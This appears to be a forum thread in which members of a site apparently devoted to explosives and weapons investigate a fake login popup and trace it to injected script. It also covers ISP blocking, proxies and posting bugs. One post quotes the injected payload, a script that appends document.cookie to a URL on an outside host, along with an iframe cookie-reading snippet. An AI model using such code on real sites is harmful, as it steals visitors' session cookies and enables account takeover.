I was asked to log in which I thought was strange as I had 'remember me' set.

When I typed in the details (actually hesitating to check the URL was right) and clicked 'log in' a box popped up and, whilst I'm not sure of the exact contents (didn't think fast enough to hit print screen) it had some sort of URL with my username, password and cgi.bin as part of it.

I changed my password immediately just in case (not sure if that will even help though), but I've no idea what this was as I've never seen it before.

Has anyone else had this happen? Any ideas what it is?

I'm a little concerned about logging into anything else via my computer now...

I was asked to log in which I thought was strange as I had 'remember me' set.

When I typed in the details (actually hesitating to check the URL was right) and clicked 'log in' a box popped up and, whilst I'm not sure of the exact contents (didn't think fast enough to hit print screen) it had some sort of URL with my username, password and cgi.bin as part of it.

I changed my password immediately just in case (not sure if that will even help though), but I've no idea what this was as I've never seen it before.

Has anyone else had this happen? Any ideas what it is?

I'm a little concerned about logging into anything else via my computer now...

Have you changed your browser settings or browser recently?

Firefox and IE both warn about submitted information to an unencrypted website being readable in transit. It might be a javascript exploit, or some other suspect trick.

Did the URL work ok? If so (since you are posting it would seem so) then it's possible a really badly written bit of spyware sent your details elsewhere.

Without a screenshot, it's not possible to say.

Have you changed your browser settings or browser recently?

Firefox and IE both warn about submitted information to an unencrypted website being readable in transit. It might be a javascript exploit, or some other suspect trick.

Did the URL work ok? If so (since you are posting it would seem so) then it's possible a really badly written bit of spyware sent your details elsewhere.

Without a screenshot, it's not possible to say.

The only thing I did recently was clear my history in IE, nothing more.

I know, it's a shame I didn't get a screen shot; I was somewhat eager to get into my account to change the password and I just hit the [x] and carried on. When I had closed the strange message box, I found that I wasn't actually logged in so I tried again and it went just fine using the same URL.

Just to be on the safe side I'm not going to log into anything else. I'm going to switch to a different computer and format this one.

[EDIT]

I got a screenshot of it!

I tried clicking on Jack's thread on the lack of discussion and instead of displaying the thread it asked me to log in (despite me already being logged in).

I remember that it was doing exactly that which triggered the original popup! Clicking on other threads doesn't trigger it.

I've asked a friend to try clicking on it too and he gets the same thing when he types something into the username and password fields. It spits it back at you in this form:

http://m.dynu.net/0p/cgi-bin/x.cgi?Dave Angel:password

I can't seem to attach files with edit mode but all the pertinent information is there. My friend seems to think it's not a password catcher but some sort of error on the board - especially as it happens at his end too and during no other logins on the web. I think I'll abort my formatting plan, for now.

I'm sure the more computer literate will be able to point out exactly what is going on.

The only thing I did recently was clear my history in IE, nothing more.

I know, it's a shame I didn't get a screen shot; I was somewhat eager to get into my account to change the password and I just hit the [x] and carried on. When I had closed the strange message box, I found that I wasn't actually logged in so I tried again and it went just fine using the same URL.

Just to be on the safe side I'm not going to log into anything else. I'm going to switch to a different computer and format this one.

[EDIT]

I got a screenshot of it!

I tried clicking on Jack's thread on the lack of discussion and instead of displaying the thread it asked me to log in (despite me already being logged in).

I remember that it was doing exactly that which triggered the original popup! Clicking on other threads doesn't trigger it.

I've asked a friend to try clicking on it too and he gets the same thing when he types something into the username and password fields. It spits it back at you in this form:

http://m.dynu.net/0p/cgi-bin/x.cgi?Dave Angel:password

I can't seem to attach files with edit mode but all the pertinent information is there. My friend seems to think it's not a password catcher but some sort of error on the board - especially as it happens at his end too and during no other logins on the web. I think I'll abort my formatting plan, for now.

I'm sure the more computer literate will be able to point out exactly what is going on.

I just had the same thing at 15h04 GMT.

I took a screenshot and it shows nothing but my password so I won't save it.

I have the link, it is :

http://m.dynu.net/0p/cgi-bin/x.cgi?username:password

I don't like that, it sounds like somebody has hacked roguesci...

I've immediately changed my password using the "lost password" function so no hook would steal it.

I've tried to login again and my firewall reports no link to this website anymore.

This is quite strange. If the webmaster wants help to analyse the http log I can help. We have to find how that sucker got inside the forum to patch it before somebody does anything nasty.

Be aware and think twice before entering your password !

+++++++++

You do NOT have to post the same thing THREE times! If this wasn't qeued for approval, you'd be out for post whoring.

NBK

I just had the same thing at 15h04 GMT.

I took a screenshot and it shows nothing but my password so I won't save it.

I have the link, it is :

http://m.dynu.net/0p/cgi-bin/x.cgi?username:password

I don't like that, it sounds like somebody has hacked roguesci...

I've immediately changed my password using the "lost password" function so no hook would steal it.

I've tried to login again and my firewall reports no link to this website anymore.

This is quite strange. If the webmaster wants help to analyse the http log I can help. We have to find how that sucker got inside the forum to patch it before somebody does anything nasty.

Be aware and think twice before entering your password !

+++++++++

You do NOT have to post the same thing THREE times! If this wasn't qeued for approval, you'd be out for post whoring.

NBK

I know next to nothing about computers, but erasing your browsing history could have erased the cookie that enables automatic log-in (the 'remember me' thingie).

Had the same problem once.

I know next to nothing about computers, but erasing your browsing history could have erased the cookie that enables automatic log-in (the 'remember me' thingie).

Had the same problem once.

I had the same thing happen today. Hope it's nothing major

I had the same thing happen today. Hope it's nothing major

Take a look at the higher directory: http://snow.prohosting.com/0p/cgi-bin/

Some asshole is definately trying to fuck with us! There is an IE expliot and a cgi file that names roguesci. Something fishy going on there :(

Take a look at the higher directory: http://snow.prohosting.com/0p/cgi-bin/

Some asshole is definately trying to fuck with us! There is an IE expliot and a cgi file that names roguesci. Something fishy going on there :(

I've been logging in and seeing the message in the upper corner that says "You last visited:" showing a date when I was NOT here!

I don't know what that's all about.

I've been logging in and seeing the message in the upper corner that says "You last visited:" showing a date when I was NOT here!

I don't know what that's all about.

Someone has just done something that means there are now " (quotes) all over the place.

I spotted this error, too:

Warning: Unknown(http://www.freepgs.com/s-labs/rs.php): failed to open stream: HTTP request failed! in /includes/functions.php(2058) : eval()'d code on line 1


Now, that's not the right host, so someone is doing something that cross-links to another site, I think. I'm running with Javascript completely off, but if it is server side, it will get everything anyway! However, the inserted code is:

<script src=http://m.dynu.net/0p/rs.js></script>


That script is returned as:

var a = "http://free.prohosting.com/0p/cgi-bin/roguesci.cgi?" + document.cookie;
image1 = new Image();
image1.src = a;

It looks like something to harvest IPs rather than passwords?

The file "cookie.html" reads:

<iframe name="iframe1" src="http://www.freepgs.com/s-labs/forums/vbulletin/" align="top" height="100" width="400" hspace="10" vspace="10">Your browser does not support iframes!</iframe>

<script>
function ShowCookie()
{
alert(window.frames['iframe1'].document.cookie);
}
setTimeout("ShowCookie()",2000);
</script>


A visit to the freepgs.com URL returns a blank page, and the trace routes for freepgs.com goes towards Washington, whilst the rs server go towards Dallas. Possible our idiot friends at iDickFenceWithMyGayBuddies are up to something again?

Edit: http://www.freepgs.com/s-labs/forums/vbulletin/ is a bulletin board?!? 2 members, no posts... Possible mis-direction?

Someone has just done something that means there are now " (quotes) all over the place.

I spotted this error, too:

Warning: Unknown(http://www.freepgs.com/s-labs/rs.php): failed to open stream: HTTP request failed! in /includes/functions.php(2058) : eval()'d code on line 1


Now, that's not the right host, so someone is doing something that cross-links to another site, I think. I'm running with Javascript completely off, but if it is server side, it will get everything anyway! However, the inserted code is:

<script src=http://m.dynu.net/0p/rs.js></script>


That script is returned as:

var a = "http://free.prohosting.com/0p/cgi-bin/roguesci.cgi?" + document.cookie;
image1 = new Image();
image1.src = a;

It looks like something to harvest IPs rather than passwords?

The file "cookie.html" reads:

<iframe name="iframe1" src="http://www.freepgs.com/s-labs/forums/vbulletin/" align="top" height="100" width="400" hspace="10" vspace="10">Your browser does not support iframes!</iframe>

<script>
function ShowCookie()
{
alert(window.frames['iframe1'].document.cookie);
}
setTimeout("ShowCookie()",2000);
</script>


A visit to the freepgs.com URL returns a blank page, and the trace routes for freepgs.com goes towards Washington, whilst the rs server go towards Dallas. Possible our idiot friends at iDickFenceWithMyGayBuddies are up to something again?

Edit: http://www.freepgs.com/s-labs/forums/vbulletin/ is a bulletin board?!? 2 members, no posts... Possible mis-direction?

The roguesci.cgi file looks like it tries to serve an advertisment. Is their nothing more foul and cruel than the spammers trying to associate us with advertisments? Perhaps the spammers union decided we are the oldest ad free site on cyberspace and they can't stand it.

I wonder if someone is trying to build a website that gives the appearance of being an official Rogue Science page to lure the unwary? They do this a lot with ebay and the like.

The roguesci.cgi file looks like it tries to serve an advertisment. Is their nothing more foul and cruel than the spammers trying to associate us with advertisments? Perhaps the spammers union decided we are the oldest ad free site on cyberspace and they can't stand it.

I wonder if someone is trying to build a website that gives the appearance of being an official Rogue Science page to lure the unwary? They do this a lot with ebay and the like.

Of course, a small tracking web bug that records the IP and time of any and all page accesses would be a bad thing to be sent to the police/FBI and newspapers... Kick up a stink an who knows what might happen?

After all, the UK police just shot a man in the head five times at very close range, while he was on the floor. He wore a puffer jacket, and tried to get on the tube... He wasn't even darkly tanned. From there, I can see Tomahawk missiles being used against forum members, as "suspected associated of suspected terrorists"!

The main risk is, if someone has got a way into the admin side of things (access to the server) they could log IPs, or add malicious javascript, change posts, and even infect some machines with trojans or spyware.

Of course, a small tracking web bug that records the IP and time of any and all page accesses would be a bad thing to be sent to the police/FBI and newspapers... Kick up a stink an who knows what might happen?

After all, the UK police just shot a man in the head five times at very close range, while he was on the floor. He wore a puffer jacket, and tried to get on the tube... He wasn't even darkly tanned. From there, I can see Tomahawk missiles being used against forum members, as "suspected associated of suspected terrorists"!

The main risk is, if someone has got a way into the admin side of things (access to the server) they could log IPs, or add malicious javascript, change posts, and even infect some machines with trojans or spyware.

Fantastic. I wonder if this is going to be yet another problem?


Better not cost me more of my time.

I think I found another bug:
I was making a post in the PETN thread and went to 'preview post' but the board wanted me to log in, I was already logged in, confirmed by the logged in status in the upper right corner. So as I try to log in figuring my connection must have timed out or some such, I was then greeted with a message saying I wasn't authorized to access this page. I finally gave up and just posted. Then when I came here to make this post when I clicked the post reply button I was told I wasn't authorized to view this page, after going back and trying again I hit another log in request form, this was only 10-20(tops) minutes after I logged on to the site and made my post in the PETN thread.

on a side note is there a way to set the 'remeber me' check box's default to be unchecked rather than check? just a preference so someone dosne't stumble onto my account unwittingly.

It works, it works! Ha Ha! :D

I maybe paranoid but if someone scoop IPs and set bugs to force us to keep logging all the time now and then he might be trying to do some kind of analysis that should pinpoint our identity through monitoring IPs, people that have access to certain computers inside office or leave a trail at ISP through modem connection, montoring cameras inside cyber-caffes ect. Some computers just wont let me to this site particularly if I use IE which is good since the crap inside is planted to be IE security hole.

I noticed when activley logging out(as opposed to just closing the window) The site first takes me to a page saying log out succesful and 'all cookies have been cleared' along with giving me the oppourtunity to go back to the page I was viewing or back to the main index. Contrary to what it says the upper right bar still welcomes me as Skean Dhu, implying I am in fact still logged in. Upon clicking the log off button a second time my account is actually logged off.
What gives?

Looks like some people are having some trouble actually logging in. I was contact by simply RED, and apparently neither he, me234 and Joeychemist can log in at all, for them the login button simply does not respond.

Seems like from our locations it is impossible to login. You write your username and password, click "log in" but the button does not work. Actually all "grey" buttons (look like login) do not work.

Hopefully this is something easily fixed.

This problem could be very widespread, and could be why we are currently getting one post every couple days.

I had same problem when I try logged in so I change browser.No problems any more.

I did have this problem for a long time where the forum recognised me as "Davo". I could post easily without having to log in again but when I went to check user CP or send private messages to other users it asked me to log in. At the time I logged back in and haven't had the problem since. - note I'm using firefox not IE, that may have something to do with it, may simply be cookies being erased.

Yup, it has to do with Idiot Explorer, I just started it up for a laugh, and indeed, it doesn't allow me to login...
Another reason to use a real browser, Firefox DOES work properly, I just logged out and logged back in, no problemo...

I just tried the same test, with exactly the same results. So, those you using IE might have to switch to firefox to get access to the forum.

Is this some giant 'get firefox' conspiracy? ;)

Thanks for the hint that it was Win IE screwing things up. I've been trying to log in for 3 days. Everything seemed fine, the log in button would depress, but it did NOTHING.

Downloaded Firefox, logged in, all is fine now. :)

Problem fixed. Internet Explorer users should not have a problem anymore.

Nearly 2 months of not being able to post are apparently over...

Thank you for fixing that.

Same here.

Um, I posted this message yesterday and now it's gone. I don't think it was deleted, NBK edits & warns but he doesn't delete unless asked to.

I hope this time my message shows up.


I'm using Idiot Explorer, not because I like it but because I'm on my home PC, which is actaully my dad's PC, and you know how it goes... In about a week I'll be posting from college, using FF.

As idiotic as IE is, I think all these bugs really got to be cleared up. We're losing members like there's no tommorow, and that's partly because of bugs, and the outage earlier this year.

I think it may be worth it getting someone who's talented with VBB to fix this site up, it seems that Mega doesn't have the time. And fix the FTP also.

Anyone know anyone?

Edit: and quick reply is all that works. And sometimes it doesn't: I can post in the victorinox thread.

This is the first time I've been able to log in in a while, so I didn't delete your post. Most likely it got lost by the board.

This is the first time I log in for three months.
Hope problems are fixed and ENW going back to normal :) .

From Varna it was absolutely impossible to log in - no matter what explorer you use.
I tried Idiot Explorer and Fire Fox with no resault.

Even worse, some providers have filtered the adress and only 404 was observed when trying from them .

I read that the german government is filtering out "bomb" sites, thus germans may be having trouble accessing us as well. Wouldn't surprise if the whole E.U. starts blocking us...don't want to frighten the sheep now, would we? :p

I haven't even been able to access the site in months: keep getting 403 Forbidden errors. I've no idea why but I decided to try and proxy in and mention it. Is it an admin decision or has the UK decided to block my access to this site? :confused:

I got 403 errors when i tried to log onto the site from btinternet, but now i'm at uni on the university network it works fine

I got 403 errors when i tried to log onto the site from btinternet, but now i'm at uni on the university network it works fine
This should be mirrored into the other thread "Forum being censored?".

BT are one of the big providers in the UK.

Is there any way that we could set it so the Googlebot's can see this thread? That way, at least the cache copy would let people know that the forum is up, but the IP is blocked.

Oh, and that code injection thing is still living at dynu.net - someone with admin rights really should get the code edited out so that link isn't there any more.

I never tried to use Google cashe to read a forum or to check is it online, but it seems like a good idea that will be hard to beat - sure close the Google and you will be hated by billions (and then even NBK2000 will anvy you:D). I see only one problem, those guys that can't see forum as usual anymore can't take part in discussions here whether they see the posts or not...maybe that is the real cause of lower post rate than expected for the while now. I think maybe we can try to make an emergency e_mail to which post could be sent via regular e_mail service - we only have to implement a sorting procedure for those posts something like numbering (I have an enzyme E.C. convention system in mind when I post this).

I wasn't talking about shutting Google out of the forum, but letting it see a certain thread or two, about how the forum is selectively blocked.

It might be worth stating that RogueSci has not been shut down, in this thread, for when people see this in the Gcache, after searching for "RogueSci shutdown".

To do this easily, it might be worth moving the aforementioned threads to the Watercooler or somewhere else Google spiders freely. (Oh, ok, this is in the watercooler already!)

Edit: Oh, and that script thing at dynu.net is a dynamic DNS server, that points your name to an IP that you choose. It is using the iFrame vulnerability of this board, quite possibly to harvest all the passwords and usernames of everyone. Someone either needs to update the forum software to remove the vulnerability, or they need to edit that include out by hand. Search in Google, and there is plenty about the iFrame weakness. http://www.eweek.com/article2/0,3959,637184,00.asp for instance. Note that it only affects IE, and so the current issues with a lack of IE support might be strangely fortunate!

Jack I didn't say you wrote about closing Google - it was just a loud thinking about what would iDickOnThe Fence think up as their next action to counter it. Maybe we should give them that idea - to start campain which should have as result shuting down of Google search service as main means of proliferation of E&W related material:D. Then the rest of web comunity would come to our forum to learn "how to eliminate the iDiots in shortest time span";).

Then the rest of web comunity would come to our forum to learn "how to eliminate the iDiots in shortest time span";).

If a single :) was allowed, I'd post it. :)

What we could all do, is put up a little page somewhere on the internet, as a signpost. I'll put it in the other thread too. Basically, grab a free web host, and put up a single page saying that the Explosives and Weapons Forum at www.roguesci.org is still alive and well, but being censored, and a basic note about using a proxy server to get around the ban.

If even three of us do this, I think we will see an improvement in traffic.

zeo: Thanks; my ISP is BT, which may help to explain my situation. I also asked a good friend of mine to check his access to the site (also through BT) and he gets the same error. As you happened to mention that your university connection is unhindered, I checked that out and I too could get through. I don't intend to make a habit of it though, as it's difficult to find terminals that don't require a log-in and I don't fancy having my university username connected with The Forum!

My friend also reports that Telewest (iirc) give a 403 for roguesci, so I had a look at the Ofcom report for 2004 and the market share of UK broadband is as follows:

BT 24%
NTL 20%
AOL ~13%
Telewest 11%
Wanaoo ~9%
Tiscali ~5%
Other 18%

The approximations are there because the crappy bar graph used doesn't show some of the figures but you get the idea: over a third of the UK's broadband users are having their internet censored, and I wouldn't be surprised if it is the case with all the major providers.

If you don't mind drawing attention to yourself (something we can ill-afford) you could possibly challenge your ISP on this matter but, for example, BT's Acceptable Use Policy prohibits one from using their service for illegal activities. Accessing this site is possibly seen as illegal in the UK, given that it is "an offence to collect or have information likely to be useful to someone preparing an act of terrorism", according to section 58 of the Terrorism Act 2000. I guess browser caching counts as 'collecting', never mind actively saving the odd forum post! I would argue that the information is not likely to be useful to a terrorist, as you possess it and not the terrorist - otherwise you might as well be arrested for buying a map of London! I'd also argue that merely accessing the site, yet not those sections related to E&W, does not constitute a crime.

One could rant/argue on and on but regardless, BT doesn't need to go through the courts to 'confirm' that any kind of access is illegal, and that blocking access to the site is the 'right thing' to do. And it would be hard to convince anyone in the general populace otherwise - a fact of which most of us are acutely aware.

As for Google cache, that's how I checked the forum was still alive. I don't recall exactly how I did it but it was probably just a search for a recent posting date and then view cache.

JC: I like the idea of pointing some freehosts at roguesci, and there's nothing to stop three of us doing it three times! My html capabilities aren't really all that great but I can probably throw some sort of notepad html thing together with a rough guide to proxies and how to use them with IE and Firefox (the two browsers I am familiar with). I'm no authority on such matters though so I'm perhaps not the best person to prepare the page (though I'm happy to do it, I'd rather take an accurately written one and help to put it up multiple times). Also, I know there is nothing to stop the proxy from looking at what websites you are browsing but is it not possible for them to 'read' your username and password as you log-in, or are they encrypted at your end before sending? This concerns me every time I log into The Forum via a proxy to search or post (and somewhat deters me from doing so). You seem to know a bit about the workings of these things JC; any ideas/advice?

Meanwhile, I wonder if the call centre staff of my potential new ISPs have any idea how to answer the question "Do you censor the internet for your users?" On second thoughts, I probably ought not to have my voice recorded asking such a question... what 'normal' citizen would?

Meanwhile, I wonder if the call centre staff of my potential new ISPs have any idea how to answer the question "Do you censor the internet for your users?" On second thoughts, I probably ought not to have my voice recorded asking such a question... what 'normal' citizen would?
At the moment? When getting on a train the wrong way can get you shot? Hmmm...

As regards the proxies reading your user/pass, well, yes, they can (and some are set up to do exactly that!) so you are at some risk. Of course, any computer along the way can also read anythign you send or receive... As far as I know (I'm not an admin) the user/pass are stored in an obscured way. The Pass is an MD5 (probably) rather than plain, and the username is passed as the user registration number. Of course, this wouldn't stop anyone from copying the cookies and pretending.

An SSL login would be no use, since once on the other side, the proxy would still be able to see your cookies and steal your sessions.

The only way would be to SSL the entire site, and that takes more CPU, which costs more money. And then most proxies won't let you run SSL through them.

To sum up, your password is safe, but the MD5 of it isn't.

As regards some "roguesci status mirrors", geocites, yahoo, and many more would all be good. As long as you avoid too many naughty keywords, or getting a million visitors, it should be fine.

Does anybody have a possible explanation as to why I can now always log in properly (never used to be able to, even before the recent happenings, but before then I could always post), but I can only very rarely post.
And when I CAN post, I can only post in some threads and not others.
I haven't been able to post in the Wiki thread for a long time now, and I would like to, I mean REALLY like to. I was however recently able to post a crappy 3 line post in another thread a few minutes ago, but not in the WIki thread straight after that.
WTF is going on?
Any WAG will do at this point (Wild-Assed-Guess).

Problems with the board software. Reasons I can't detail. It even affects admins, so we feel your pain.

Any WAG will do at this point (Wild-Assed-Guess).Could well be a random stop word. I've found that there are several common words that stop this BB from posting a message, and it fails just with a cryptic message.

Try cutting your post down to half, then post. If this works, the stop word is in the other half. If it doesn't, paste and swap, and post again. I found that one database command (select?) was doing it, and iirc locking, or something like it.

EDIT: Nope, neither of those! I looked one up - n_m_a_p
Try adding it to your post and seeing if it fails in the same way. :eek:

Hmm, first try with just "nmap" says it's too short, so trying again.

nmap
nmap
nmap

EDIT: Does this mean I win? Weird though :confused:

You're right JC, I couldn't post a minute ago, so I followed your advice and posted one half first. Then I just edited and added the other half.
Although when I clicked 'Edit' on my first post, made the changes then clicked 'Edit' again, it took me to a different screen, which looked just like the normal posting screen, and I couldn't edit from there, nothing happened when I clicked on 'Save Changes', so I went back to that first editing screen and clicked 'Save' there, and it worked.

Thanks man. I'm definitely doing this from now on.
I've also noticed that any pointless 3/4 line post I make seems to go through without a hitch, but as soon as I write anything lengthy, I can never post.

NEWSFLASH! NEWSFLASH!
Your presenter for the night: Walter Cronkite
"New to the E&W: posting by installments.
Watch this space folks (and don't change the channel ya damned sheeple)"
See I just did it again. Yipee

To post when you can login, but not post:
The main reason I can ascertain that posting is prevented, seems to be a simple matter of length. So next time you're having difficulty posting, copy your reply to a 'Word' type document, and post just the first couple lines of it. The board should allow you to post this short reply.

Now click on "Edit" and add a few lines to your post. Click on "Save" and the extra lines should be in you post when you see it.
Just keep on doing this until you have included everything you set out to include.

Now, if only I could work out how to post attachments...

P.S. Thanks to JC for inspiring this, if he hadn't mentioned key words being banned, I wouldn't have tried posting just one half of a post first to see if it had any of those key words in it.

It's a mystery. I had one post where I tracked it down to the word "Select", which is really odd, as it's a common word. You are right, though, it seems to be long posts, mostly. I'll have to be more concise in future. :-)

EDIT: nmap!

test

The message you have entered is too short. Please lengthen your message to at least 20 characters.